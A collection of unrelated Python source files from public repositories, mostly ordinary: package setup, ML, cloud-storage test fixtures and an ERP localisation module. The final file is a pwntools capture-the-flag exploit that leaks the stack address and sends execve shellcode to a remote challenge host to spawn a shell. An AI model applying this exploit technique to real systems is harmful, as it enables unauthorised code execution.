            # appending empty data on every poll.  Test truthiness instead.
            if result:
                # NOTE(review): `result` is bytes; depending on the wxPython
                # version AppendText may require result.decode('utf-8') — confirm.
                self.chatFrame.AppendText(result)
# Character pools for random-code generation.
numChar='0123456789'
enChar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

def getRandom(length=8):
    """
    Generate a random alphanumeric code.

    The original implementation drew a target digit count but never enforced
    it (the counters were decremented and ignored), so a code could end up
    all-letters or all-digits.  This version guarantees the drawn mix: at
    least one digit and at least one letter.

    @param {int} length: code length, default 8 (must be at least 4)
    @return {str} the random code, or None when length < 4
    """
    if length<4:
        return None
    # Number of digit positions: at least 1, at most length-1 (so there is
    # always at least one letter as well).
    digitCount = random.randint(1, length - 1)
    chars = [random.choice(numChar) for _ in range(digitCount)]
    chars += [random.choice(enChar) for _ in range(length - digitCount)]
    random.shuffle(chars)
    return ''.join(chars)
if __name__ == '__main__':
    # Bootstrap the GUI: the module-level Telnet connection `con` is shared
    # by the login and chat frames.
    app=wx.App()
    con=telnetlib.Telnet()
    LoginFrame(None,-1,title='Login',size=(320,250))
    app.MainLoop()
    # Leftover red-packet code generator, kept commented out for reference.
    # with open('内蒙电信红包随机码.txt', 'w',encoding='utf-8') as f:
    #     accTup=({'sum':100,'number':30},{'sum':30,'number':150},{'sum':5,'number':2500})
    #     charList=[]
    #     for i in range(3000):
    #         while True:
    #             char=getRandom(8)
    #             if char in charList:
    #                 continue
    #             else:
    #                 charList.append(char)
    #                 break;
    #     for item in accTup:
    #         charCurList=charList[0:item['number']]
    #         for char in charCurList:
    #             line=char+'\t'+str(item['sum'])+'\n'
    #             f.write(line)
    #         charList=charList[item['number']:]
    #     for char in charList:
    #         line=char+'\t'+'预留'+'\n'
    #         f.write(line)
| [
"[email protected]"
] | |
bbdb15968f9fecce8a2c0b71d9694e7fb7ea60dd | 34f1074602e711ad2311afb7e0bcd624013a954e | /setup.py | fbcce1aad21f5a3c534ac2be29a70dda74b943ca | [
"MIT",
"Apache-2.0"
] | permissive | tareqalam/websauna | e8363c7dfec7faf2a804d78bf095ed8c2fd74ca0 | d6326efe3a35cb7cc16234b1ea64198e027ff257 | refs/heads/master | 2020-12-26T04:55:45.090210 | 2016-04-01T17:10:55 | 2016-04-01T17:10:55 | 55,261,614 | 0 | 0 | null | 2016-04-01T20:51:47 | 2016-04-01T20:51:46 | null | UTF-8 | Python | false | false | 5,398 | py | import sys
from setuptools import setup, find_packages
from codecs import open
from os import path
assert sys.version_info >= (3,4), "Websauna needs Python 3.4 or newer, you have {}".format(sys.version_info)
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
    name='websauna',
    namespace_packages=["websauna"],
    # Versions should comply with PEP440. For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='0.0',
    # NOTE(review): this uses only the first whitespace-separated word of the
    # README as the short description — confirm that is intentional.
    description=long_description.split()[0],
    long_description=long_description,
    # The project's main homepage.
    url='https://github.com/websauna/websauna',
    # Author details
    author='Mikko Ohtamaa',
    author_email='[email protected]',
    # Choose your license
    license='MIT',
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 3 - Alpha',
        # Indicate who your project is intended for
        'Intended Audience :: Developers',
        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
    # What does your project relate to?
    keywords='sqlalchemy postgresql pyramid pytest',
    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=find_packages(exclude=['docs']),
    # List run-time dependencies here. These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=[
        # Pyramid dependencies
        'pyramid>=1.6',
        'waitress',
        'websauna.viewconfig',
        'pyramid_redis_sessions',
        'pyramid-layout',
        "deform>=2.0a2",
        'pyramid_deform',
        "pyramid_debugtoolbar",
        "pyramid_jinja2",
        "ipython[notebook]<4",
        "pyramid_ipython",
        "scandir", # os.scandir backport for py3.4
        "python-slugify", # ASCII slug generation
        # Time handling
        "arrow",
        "pytz",
        # SQLAlchemy and database support
        "psycopg2",
        "sqlalchemy",
        "alembic",
        "colanderalchemy",
        "pyramid_tm",
        "jsonpointer",
        "pgcli",
        # User management
        "horus",
        "authomatic",
        # Email
        'pyramid-mailer',
        'premailer',
        # Tasks
        'pyramid_celery',
        # Python 3.4 typing
        "backports.typing",
        # Needed by python_notebook etc. who call pyramid.paster module
        "pyramid_notebook>=0.1.6",
        "PasteDeploy",
        # Console logging
        "rainbow_logging_handler"
    ],
    # List additional groups of dependencies here (e.g. development
    # dependencies). You can install these using the following syntax,
    # for example:
    # $ pip install -e .[dev,test]
    extras_require={
        'dev': ['check-manifest', 'Sphinx', 'setuptools_git', 'zest.releaser', 'sphinx-autodoc-typehints', 'pyramid_autodoc', "sphinx_rtd_theme", "sphinxcontrib-zopeext", "ruamel.yaml"],
        'test': ['pytest>=2.8', 'coverage', 'webtest', 'pytest-splinter', 'pytest-timeout', 'pytest-cov', "codecov", "flaky"],
    },
    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    entry_points={
        'console_scripts': [
            'ws-sync-db=websauna.system.devop.scripts.syncdb:main',
            'ws-db-shell=websauna.system.devop.scripts.dbshell:main',
            'ws-shell=websauna.system.devop.scripts.shell:main',
            'ws-tweens=websauna.system.devop.scripts.tweens:main',
            'ws-alembic=websauna.system.devop.scripts.alembic:main',
            'ws-dump-db=websauna.system.devop.scripts.dumpdb:main',
            'ws-create-user=websauna.system.devop.scripts.createuser:main',
            'ws-celery=websauna.system.devop.scripts.celery:main',
            'ws-pserve=websauna.system.devop.scripts.pserve:main',
            'ws-create-table=websauna.system.devop.scripts.createtable:main',
            'ws-sanity-check=websauna.system.devop.scripts.sanitycheck:main',
            'ws-collect-static=websauna.system.devop.scripts.collectstatic:main',
        ],
        'paste.app_factory': [
            'main=websauna.system:main',
            # Scheduler auomated test suite entry point
            'scheduler_test=websauna.tests.test_scheduler:main',
            'tutorial_test=websauna.tests.tutorial:main',
        ],
        'pyramid.scaffold': [
            "websauna_app=websauna.scaffolds:App",
            "websauna_addon=websauna.scaffolds:Addon",
        ]
    },
)
| [
"[email protected]"
] | |
de5585cdb7d57b5786ca3a57f62a92394188651f | b085a8631b20f5548627409e7c6d42557f0d4b7d | /libs/layers/assign.py | d3eaa1fd01e1891ed4b5a79dc9f859686a1f9e98 | [
"Apache-2.0"
] | permissive | abdulmuneer/FastMaskRCNN | cd810057b4d62b035f12078e19fce46ea9d1e30e | 2bd65f0faf21e140040242d884f3e33a087e5b04 | refs/heads/master | 2021-01-20T03:41:51.455023 | 2017-04-26T10:06:41 | 2017-04-26T10:06:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | #!/usr/bin/env python
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import libs.boxes.cython_bbox as cython_bbox
import libs.configs.config_v1 as cfg
from libs.boxes.bbox_transform import bbox_transform, bbox_transform_inv, clip_boxes
from libs.boxes.anchor import anchors_plane
from libs.logs.log import LOG
# FLAGS = tf.app.flags.FLAGS
_DEBUG = False
def assign_boxes(gt_boxes, min_k=2, max_k=5):
"""assigning boxes to layers in a pyramid according to its area
Params
-----
gt_boxes: of shape (N, 5), each entry is [x1, y1, x2, y2, cls]
strides: the stride of each layer, like [4, 8, 16, 32]
Returns
-----
layer_ids: of shape (N,), each entry is a id indicating the assigned layer id
"""
k0 = 4
if gt_boxes.size > 0:
layer_ids = np.zeros((gt_boxes.shape[0], ), dtype=np.int32)
ws = gt_boxes[:, 2] - gt_boxes[:, 0]
hs = gt_boxes[:, 3] - gt_boxes[:, 1]
areas = ws * hs
k = np.floor(k0 + np.log2(np.sqrt(areas) / 224))
inds = np.where(k < min_k)[0]
k[inds] = min_k
inds = np.where(k > max_k)[0]
k[inds] = max_k
if _DEBUG:
print ("### boxes and layer ids")
print (np.hstack((gt_boxes[:, 0:4], k[:, np.newaxis])))
return k.astype(np.int32)
else:
return np.asarray([], dtype=np.int32)
| [
"[email protected]"
] | |
6b67fbc7d998de614a48c315933888a62a343846 | 6b033e3dddc280417bb97500f72e68d7378c69d6 | /V. Algorithm/ii. Site/F. LeetCode/0241_different_ways_to_add_parentheses.py | bd5f9b246157a8f093769f995d43c706ba430806 | [] | no_license | inyong37/Study | e5cb7c23f7b70fbd525066b6e53b92352a5f00bc | e36252a89b68a5b05289196c03e91291dc726bc1 | refs/heads/master | 2023-08-17T11:35:01.443213 | 2023-08-11T04:02:49 | 2023-08-11T04:02:49 | 128,149,085 | 11 | 0 | null | 2022-10-07T02:03:09 | 2018-04-05T02:17:17 | Jupyter Notebook | UTF-8 | Python | false | false | 714 | py | from typing import List
class Solution:
    """LeetCode 241 -- Different Ways to Add Parentheses.

    Given a string of digits and the binary operators '+', '-' and '*',
    compute every value obtainable by fully parenthesizing the
    expression in all possible ways.
    """

    def diffWaysToCompute(self, expression: str) -> List[int]:
        """Return all possible results of `expression` (duplicates kept).

        Divide and conquer: split at every operator, recursively collect
        the values of the left and right sub-expressions, and combine
        each left/right pair. Uses an operator table instead of `eval`,
        which avoids rebuilding and re-parsing a string per pair.
        """
        # Base case: an operator-free expression is a single number.
        if expression.isdigit():
            return [int(expression)]

        ops = {
            "+": lambda a, b: a + b,
            "-": lambda a, b: a - b,
            "*": lambda a, b: a * b,
        }
        results = []
        for idx, ch in enumerate(expression):
            op = ops.get(ch)
            if op is None:
                continue
            left = self.diffWaysToCompute(expression[:idx])
            right = self.diffWaysToCompute(expression[idx + 1:])
            # Same pairing order as the original nested left/right loops.
            results.extend(op(l, r) for l in left for r in right)
        return results
| [
"[email protected]"
] | |
a370b77af6502fb608bde82df099f9416b01af0f | 06c0d8151983a7f16aa3d18b254b5f0ef012197e | /tests/conformance/conftest.py | e62b74e8bfadee13e226066ff225ddbf0bb12010 | [
"Apache-2.0"
] | permissive | googleapis/python-storage | 3a15ece3cecb95ee8b9fb0b193757961f6e0f027 | bdd7c6c19c96a4dbd2249ba39399f8f6ff799fe1 | refs/heads/main | 2023-09-03T13:02:17.527509 | 2023-08-31T20:09:41 | 2023-08-31T20:09:41 | 226,992,639 | 363 | 161 | Apache-2.0 | 2023-09-02T01:01:14 | 2019-12-10T00:10:14 | Python | UTF-8 | Python | false | false | 3,881 | py | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import random
import uuid
import pytest
from google.auth.credentials import AnonymousCredentials
from google.cloud import storage
from google.cloud.exceptions import NotFound
"""Environment variable or default host for Storage testbench emulator."""
_HOST = os.environ.get("STORAGE_EMULATOR_HOST", "http://localhost:9000")
"""Emulated project information for the storage testbench."""
_CONF_TEST_PROJECT_ID = "my-project-id"
_CONF_TEST_SERVICE_ACCOUNT_EMAIL = (
"[email protected]"
)
_CONF_TEST_PUBSUB_TOPIC_NAME = "my-topic-name"
"""Create content payload in different sizes."""
def _create_block(desired_kib):
line = "abcdefXYZ123456789ADDINGrandom#" # len(line) = 31
multiplier = int(desired_kib / (len(line) + 1))
lines = "".join(
line + str(random.randint(0, 9)) for _ in range(multiplier)
) # add random single digit integers
return 1024 * lines
_STRING_CONTENT = "hello world"
_SIZE_9MB = 9216 # 9*1024 KiB
########################################################################################################################################
### Pytest Fixtures to Populate Retry Conformance Test Resources #######################################################################
########################################################################################################################################
@pytest.fixture
def client():
    """Storage client wired to the local testbench emulator.

    Anonymous credentials suffice because requests go to the emulator
    endpoint (`_HOST`), not to real GCS.
    """
    client = storage.Client(
        project=_CONF_TEST_PROJECT_ID,
        credentials=AnonymousCredentials(),
        client_options={"api_endpoint": _HOST},
    )
    return client
@pytest.fixture
def bucket(client):
    """Create a uniquely named bucket; force-delete it at teardown."""
    new_bucket = client.bucket(uuid.uuid4().hex)
    client.create_bucket(new_bucket)
    yield new_bucket
    try:
        new_bucket.delete(force=True)
    except NotFound:
        # The test itself may already have deleted the bucket.
        pass
@pytest.fixture
def object(client, bucket):
    """Create a blob holding the small string payload; delete it at teardown."""
    new_blob = client.bucket(bucket.name).blob(uuid.uuid4().hex)
    new_blob.upload_from_string(_STRING_CONTENT)
    new_blob.reload()
    yield new_blob
    try:
        new_blob.delete()
    except NotFound:
        # The test itself may already have deleted the object.
        pass
@pytest.fixture
def notification(client, bucket):
    """Pub/Sub notification attached to the test bucket; removed at teardown."""
    notification = client.bucket(bucket.name).notification(
        topic_name=_CONF_TEST_PUBSUB_TOPIC_NAME
    )
    notification.create()
    notification.reload()
    yield notification
    try:
        notification.delete()
    except NotFound: # in cases where notification is deleted within the test
        pass
@pytest.fixture
def hmac_key(client):
    """HMAC key for the emulated service account.

    Teardown deactivates the key before deleting it (the delete here is
    only attempted after setting state to INACTIVE).
    """
    hmac_key, _secret = client.create_hmac_key(
        service_account_email=_CONF_TEST_SERVICE_ACCOUNT_EMAIL,
        project_id=_CONF_TEST_PROJECT_ID,
    )
    yield hmac_key
    try:
        hmac_key.state = "INACTIVE"
        hmac_key.update()
        hmac_key.delete()
    except NotFound: # in cases where hmac_key is deleted within the test
        pass
@pytest.fixture
def file_data(client, bucket):
    """Yield a (blob, payload) pair with a ~9 MiB payload (_SIZE_9MB KiB)."""
    blob = client.bucket(bucket.name).blob(uuid.uuid4().hex)
    payload = _create_block(_SIZE_9MB)
    blob.upload_from_string(payload)
    yield blob, payload
    try:
        blob.delete()
    except NotFound: # in cases where object is deleted within the test
        pass
| [
"[email protected]"
] | |
37b862cdca4f6aaadc98f6f52088f748238199fc | d4f2e2e3552ab4b111f78cfbad0d30c144201093 | /2017-06-12/fib_pool.py | f13094e9069f611b6d36535aced6b7f77612ccaa | [
"Apache-2.0"
] | permissive | dongweiming/mp | c1e9f6f2c1fd8adbd4d7b8ffc45c5cc288cdcd80 | 129c31c818e1f0c39c983aad1f2f1ad9fa7efb1c | refs/heads/master | 2023-04-29T07:56:27.198574 | 2022-10-30T04:20:09 | 2022-10-30T04:21:27 | 75,051,758 | 96 | 35 | Apache-2.0 | 2023-04-17T17:34:17 | 2016-11-29T06:44:53 | Python | UTF-8 | Python | false | false | 358 | py | # coding=utf-8
import time
from multiprocessing.pool import Pool
NUMBERS = range(25, 38)
def fib(n):
    """Return the n-th Fibonacci number (fib(1) == fib(2) == 1).

    Deliberately naive exponential recursion -- it serves as the
    CPU-bound workload for the multiprocessing Pool demo below.
    """
    return 1 if n <= 2 else fib(n - 1) + fib(n - 2)
# Time the parallel computation of fib() over NUMBERS.
start = time.time()
pool = Pool(3)  # three worker processes
for num, result in zip(NUMBERS, pool.map(fib, NUMBERS)):
    print('fib({}) = {}'.format(num, result))
print('COST: {}'.format(time.time() - start))
| [
"[email protected]"
] | |
c5b1f4a73c9c08155e9a6d60d56eb20d4a326fe6 | b08870f8fe7b3cf1bbab3c52a7bacbb36ee1dcc6 | /verp/regional/italy/setup.py | 3d54c566d12ddaeac03248cdc8b198f91b7354b0 | [] | no_license | vsadminpk18/verpfinalversion | 7148a64fe6134e2a6371470aceb1b57cc4b5a559 | 93d164b370ad9ca0dd5cda0053082dc3abbd20da | refs/heads/master | 2023-07-13T04:11:59.211046 | 2021-08-27T06:26:48 | 2021-08-27T06:26:48 | 400,410,611 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,292 | py | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
# coding=utf-8
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.custom.doctype.custom_field.custom_field import create_custom_fields
from frappe.permissions import add_permission, update_permission_property
from verp.regional.italy import fiscal_regimes, tax_exemption_reasons, mode_of_payment_codes, vat_collectability_options
def setup(company=None, patch=True):
	"""Install the Italy regional customizations.

	Adds the e-invoicing custom fields, enables the Electronic Invoice
	Register report and grants the related permissions. `company` and
	`patch` are accepted for API compatibility with other regional setup
	hooks but are not used here.
	"""
	make_custom_fields()
	setup_report()
	add_permissions()
def make_custom_fields(update=True):
	"""Create (or update) the custom DocFields required for Italian
	electronic invoicing on the relevant doctypes.

	`update=True` also updates fields that already exist. The field
	definitions below are declarative; `create_custom_fields` at the end
	performs the actual database work.
	"""
	# Tax breakdown columns shared by all transaction item doctypes.
	invoice_item_fields = [
		dict(fieldname='tax_rate', label='Tax Rate',
			fieldtype='Float', insert_after='description',
			print_hide=1, hidden=1, read_only=1),
		dict(fieldname='tax_amount', label='Tax Amount',
			fieldtype='Currency', insert_after='tax_rate',
			print_hide=1, hidden=1, read_only=1, options="currency"),
		dict(fieldname='total_amount', label='Total Amount',
			fieldtype='Currency', insert_after='tax_amount',
			print_hide=1, hidden=1, read_only=1, options="currency")
	]
	# Customer purchase-order reference, shown only on Sales Invoice Item.
	customer_po_fields = [
		dict(fieldname='customer_po_details', label='Customer PO',
			fieldtype='Section Break', insert_after='image'),
		dict(fieldname='customer_po_no', label='Customer PO No',
			fieldtype='Data', insert_after='customer_po_details',
			fetch_from = 'sales_order.po_no',
			print_hide=1, allow_on_submit=1, fetch_if_empty= 1, read_only=1, no_copy=1),
		dict(fieldname='customer_po_clm_brk', label='',
			fieldtype='Column Break', insert_after='customer_po_no',
			print_hide=1, read_only=1),
		dict(fieldname='customer_po_date', label='Customer PO Date',
			fieldtype='Date', insert_after='customer_po_clm_brk',
			fetch_from = 'sales_order.po_date',
			print_hide=1, allow_on_submit=1, fetch_if_empty= 1, read_only=1, no_copy=1)
	]
	# Map of doctype -> list of custom field definitions.
	custom_fields = {
		'Company': [
			dict(fieldname='sb_e_invoicing', label='E-Invoicing',
				fieldtype='Section Break', insert_after='date_of_establishment', print_hide=1),
			dict(fieldname='fiscal_regime', label='Fiscal Regime',
				fieldtype='Select', insert_after='sb_e_invoicing', print_hide=1,
				options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), fiscal_regimes))),
			dict(fieldname='fiscal_code', label='Fiscal Code', fieldtype='Data', insert_after='fiscal_regime', print_hide=1,
				description=_("Applicable if the company is an Individual or a Proprietorship")),
			dict(fieldname='vat_collectability', label='VAT Collectability',
				fieldtype='Select', insert_after='fiscal_code', print_hide=1,
				options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), vat_collectability_options))),
			dict(fieldname='cb_e_invoicing1', fieldtype='Column Break', insert_after='vat_collectability', print_hide=1),
			dict(fieldname='registrar_office_province', label='Province of the Registrar Office',
				fieldtype='Data', insert_after='cb_e_invoicing1', print_hide=1, length=2),
			dict(fieldname='registration_number', label='Registration Number',
				fieldtype='Data', insert_after='registrar_office_province', print_hide=1, length=20),
			dict(fieldname='share_capital_amount', label='Share Capital',
				fieldtype='Currency', insert_after='registration_number', print_hide=1,
				description=_('Applicable if the company is SpA, SApA or SRL')),
			dict(fieldname='no_of_members', label='No of Members',
				fieldtype='Select', insert_after='share_capital_amount', print_hide=1,
				options="\nSU-Socio Unico\nSM-Piu Soci", description=_("Applicable if the company is a limited liability company")),
			dict(fieldname='liquidation_state', label='Liquidation State',
				fieldtype='Select', insert_after='no_of_members', print_hide=1,
				options="\nLS-In Liquidazione\nLN-Non in Liquidazione")
		],
		'Sales Taxes and Charges': [
			dict(fieldname='tax_exemption_reason', label='Tax Exemption Reason',
				fieldtype='Select', insert_after='included_in_print_rate', print_hide=1,
				depends_on='eval:doc.charge_type!="Actual" && doc.rate==0.0',
				options="\n" + "\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), tax_exemption_reasons))),
			dict(fieldname='tax_exemption_law', label='Tax Exempt Under',
				fieldtype='Text', insert_after='tax_exemption_reason', print_hide=1,
				depends_on='eval:doc.charge_type!="Actual" && doc.rate==0.0')
		],
		'Customer': [
			dict(fieldname='fiscal_code', label='Fiscal Code', fieldtype='Data', insert_after='tax_id', print_hide=1),
			dict(fieldname='recipient_code', label='Recipient Code',
				fieldtype='Data', insert_after='fiscal_code', print_hide=1, default="0000000"),
			dict(fieldname='pec', label='Recipient PEC',
				fieldtype='Data', insert_after='fiscal_code', print_hide=1),
			dict(fieldname='is_public_administration', label='Is Public Administration',
				fieldtype='Check', insert_after='is_internal_customer', print_hide=1,
				description=_("Set this if the customer is a Public Administration company."),
				depends_on='eval:doc.customer_type=="Company"'),
			dict(fieldname='first_name', label='First Name', fieldtype='Data',
				insert_after='salutation', print_hide=1, depends_on='eval:doc.customer_type!="Company"'),
			dict(fieldname='last_name', label='Last Name', fieldtype='Data',
				insert_after='first_name', print_hide=1, depends_on='eval:doc.customer_type!="Company"')
		],
		'Mode of Payment': [
			dict(fieldname='mode_of_payment_code', label='Code',
				fieldtype='Select', insert_after='included_in_print_rate', print_hide=1,
				options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), mode_of_payment_codes)))
		],
		'Payment Schedule': [
			dict(fieldname='mode_of_payment_code', label='Code',
				fieldtype='Select', insert_after='mode_of_payment', print_hide=1,
				options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), mode_of_payment_codes)),
				fetch_from="mode_of_payment.mode_of_payment_code", read_only=1),
			dict(fieldname='bank_account', label='Bank Account',
				fieldtype='Link', insert_after='mode_of_payment_code', print_hide=1,
				options="Bank Account"),
			dict(fieldname='bank_account_name', label='Bank Name',
				fieldtype='Data', insert_after='bank_account', print_hide=1,
				fetch_from="bank_account.bank", read_only=1),
			dict(fieldname='bank_account_no', label='Bank Account No',
				fieldtype='Data', insert_after='bank_account_name', print_hide=1,
				fetch_from="bank_account.bank_account_no", read_only=1),
			dict(fieldname='bank_account_iban', label='IBAN',
				fieldtype='Data', insert_after='bank_account_name', print_hide=1,
				fetch_from="bank_account.iban", read_only=1),
			dict(fieldname='bank_account_swift_number', label='Swift Code (BIC)',
				fieldtype='Data', insert_after='bank_account_iban', print_hide=1,
				fetch_from="bank_account.swift_number", read_only=1),
		],
		"Sales Invoice": [
			dict(fieldname='vat_collectability', label='VAT Collectability',
				fieldtype='Select', insert_after='taxes_and_charges', print_hide=1,
				options="\n".join(map(lambda x: frappe.safe_decode(x, encoding='utf-8'), vat_collectability_options)),
				fetch_from="company.vat_collectability"),
			dict(fieldname='sb_e_invoicing_reference', label='E-Invoicing',
				fieldtype='Section Break', insert_after='against_income_account', print_hide=1),
			dict(fieldname='company_fiscal_code', label='Company Fiscal Code',
				fieldtype='Data', insert_after='sb_e_invoicing_reference', print_hide=1, read_only=1,
				fetch_from="company.fiscal_code"),
			dict(fieldname='company_fiscal_regime', label='Company Fiscal Regime',
				fieldtype='Data', insert_after='company_fiscal_code', print_hide=1, read_only=1,
				fetch_from="company.fiscal_regime"),
			dict(fieldname='cb_e_invoicing_reference', fieldtype='Column Break',
				insert_after='company_fiscal_regime', print_hide=1),
			dict(fieldname='customer_fiscal_code', label='Customer Fiscal Code',
				fieldtype='Data', insert_after='cb_e_invoicing_reference', read_only=1,
				fetch_from="customer.fiscal_code"),
			dict(fieldname='type_of_document', label='Type of Document',
				fieldtype='Select', insert_after='customer_fiscal_code',
				options='\nTD01\nTD02\nTD03\nTD04\nTD05\nTD06\nTD16\nTD17\nTD18\nTD19\nTD20\nTD21\nTD22\nTD23\nTD24\nTD25\nTD26\nTD27'),
		],
		'Purchase Invoice Item': invoice_item_fields,
		'Sales Order Item': invoice_item_fields,
		'Delivery Note Item': invoice_item_fields,
		'Sales Invoice Item': invoice_item_fields + customer_po_fields,
		'Quotation Item': invoice_item_fields,
		'Purchase Order Item': invoice_item_fields,
		'Purchase Receipt Item': invoice_item_fields,
		'Supplier Quotation Item': invoice_item_fields,
		'Address': [
			dict(fieldname='country_code', label='Country Code',
				fieldtype='Data', insert_after='country', print_hide=1, read_only=0,
				fetch_from="country.code"),
			dict(fieldname='state_code', label='State Code',
				fieldtype='Data', insert_after='state', print_hide=1)
		],
		'Purchase Invoice': [
			dict(fieldname='document_type', label='Document Type',
				fieldtype='Data', insert_after='company', print_hide=1, read_only=1
			),
			dict(fieldname='destination_code', label='Destination Code',
				fieldtype='Data', insert_after='company', print_hide=1, read_only=1
			),
			dict(fieldname='imported_grand_total', label='Imported Grand Total',
				fieldtype='Data', insert_after='update_auto_repeat_reference', print_hide=1, read_only=1
			)
		],
		'Purchase Taxes and Charges': [
			dict(fieldname='tax_rate', label='Tax Rate',
				fieldtype='Data', insert_after='parenttype', print_hide=1, read_only=0
			)
		],
		'Supplier': [
			dict(fieldname='fiscal_code', label='Fiscal Code',
				fieldtype='Data', insert_after='tax_id', print_hide=1, read_only=1
			),
			dict(fieldname='fiscal_regime', label='Fiscal Regime',
				fieldtype='Select', insert_after='fiscal_code', print_hide=1, read_only=1,
				options= "\nRF01\nRF02\nRF04\nRF05\nRF06\nRF07\nRF08\nRF09\nRF10\nRF11\nRF12\nRF13\nRF14\nRF15\nRF16\nRF17\nRF18\nRF19"
			)
		]
	}
	# ignore_validate is set during patches so that field creation does not
	# fail validation mid-migration.
	create_custom_fields(custom_fields, ignore_validate = frappe.flags.in_patch, update=update)
def setup_report():
	"""Enable the Electronic Invoice Register report and restrict it to
	the accounting roles via a Custom Role (created only if missing)."""
	report_name = 'Electronic Invoice Register'
	frappe.db.set_value("Report", report_name, "disabled", 0)
	if not frappe.db.get_value('Custom Role', dict(report=report_name)):
		frappe.get_doc(dict(
			doctype='Custom Role',
			report=report_name,
			roles= [
				dict(role='Accounts User'),
				dict(role='Accounts Manager')
			]
		)).insert()
def add_permissions():
	"""Grant role permissions on the Import Supplier Invoice doctype.

	All listed roles get read/print/report access; the accounting roles
	additionally get write/create, and Accounts Manager gets delete plus
	a second permission rule (third argument 1 -- presumably permlevel,
	per the frappe permission API; confirm against add_permission).
	"""
	doctype = 'Import Supplier Invoice'
	add_permission(doctype, 'All', 0)
	for role in ('Accounts Manager', 'Accounts User','Purchase User', 'Auditor'):
		add_permission(doctype, role, 0)
		update_permission_property(doctype, role, 0, 'print', 1)
		update_permission_property(doctype, role, 0, 'report', 1)
		if role in ('Accounts Manager', 'Accounts User'):
			update_permission_property(doctype, role, 0, 'write', 1)
			update_permission_property(doctype, role, 0, 'create', 1)
	update_permission_property(doctype, 'Accounts Manager', 0, 'delete', 1)
	add_permission(doctype, 'Accounts Manager', 1)
	update_permission_property(doctype, 'Accounts Manager', 1, 'write', 1)
	update_permission_property(doctype, 'Accounts Manager', 1, 'create', 1)
| [
"[email protected]"
] | |
f92bdc62fa76b59090edc88420ad797e65e5b5b8 | e17483ba000de9c6135e26ae6c09d9aa33004574 | /ipynbs/流程控制/src/lock.py | 527e33d048a10128a19edbe32bb8ce76108c1492 | [
"Apache-2.0"
] | permissive | HAOzj/TutorialForPython | 27ae50c6b9fb3289ae7f67b8106d3d4996d145a7 | df7a6db94b77f4861b11966399f5359d00911a16 | refs/heads/master | 2020-03-17T09:19:45.199165 | 2018-04-02T13:33:27 | 2018-04-02T13:33:27 | 133,470,105 | 1 | 0 | null | 2018-05-15T06:35:01 | 2018-05-15T06:35:01 | null | UTF-8 | Python | false | false | 360 | py | import multiprocessing
import sys
def worker_with(lock, f):
    """Append a marker line to file `f` while holding `lock` (via `with`)."""
    with lock, open(f, "a+") as out:
        out.write('Lock acquired via with\n')
if __name__ == '__main__':
    # Demo: one child process writes to the file under the shared lock.
    # NOTE(review): the "source" directory must already exist, otherwise
    # open() in the worker raises -- confirm intended usage.
    f = "source/file.txt"
    lock = multiprocessing.Lock()
    w = multiprocessing.Process(target=worker_with, args=(lock, f))
    w.start()
    w.join()
"[email protected]"
] | |
ef81636e011ddbfe54443ed35eb0808243aee7ec | 7e40c8bb28c2cee8e023751557b90ef7ef518326 | /pwnable_start/start.py | a51348673cc5407c52bddaa973546e1794ed2e67 | [] | no_license | 1337536723/buuctf_pwn | b6e5d65372ed0638a722faef1775026a89321fa3 | cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf | refs/heads/master | 2023-08-29T19:35:04.352530 | 2021-11-16T14:06:20 | 2021-11-16T14:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 483 | py | from pwn import *
context.log_level = "debug"
#p = process('./start')
p = remote('node4.buuoj.cn', 28412)
call_write = 0x8048087
payload = b'a' * 0x14 + p32(call_write)
p.sendafter(b"Let's start the CTF:", payload)
esp = u32(p.recv(4))
print('esp -> {}'.format(hex(esp)))
shellcode='''
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
xor edx,edx
mov ebx,esp
mov al,0xb
int 0x80
'''
payload = b'a' * 0x14 + p32(esp + 0x14) + asm(shellcode)
p.send(payload)
p.interactive()
| [
"[email protected]"
] | |
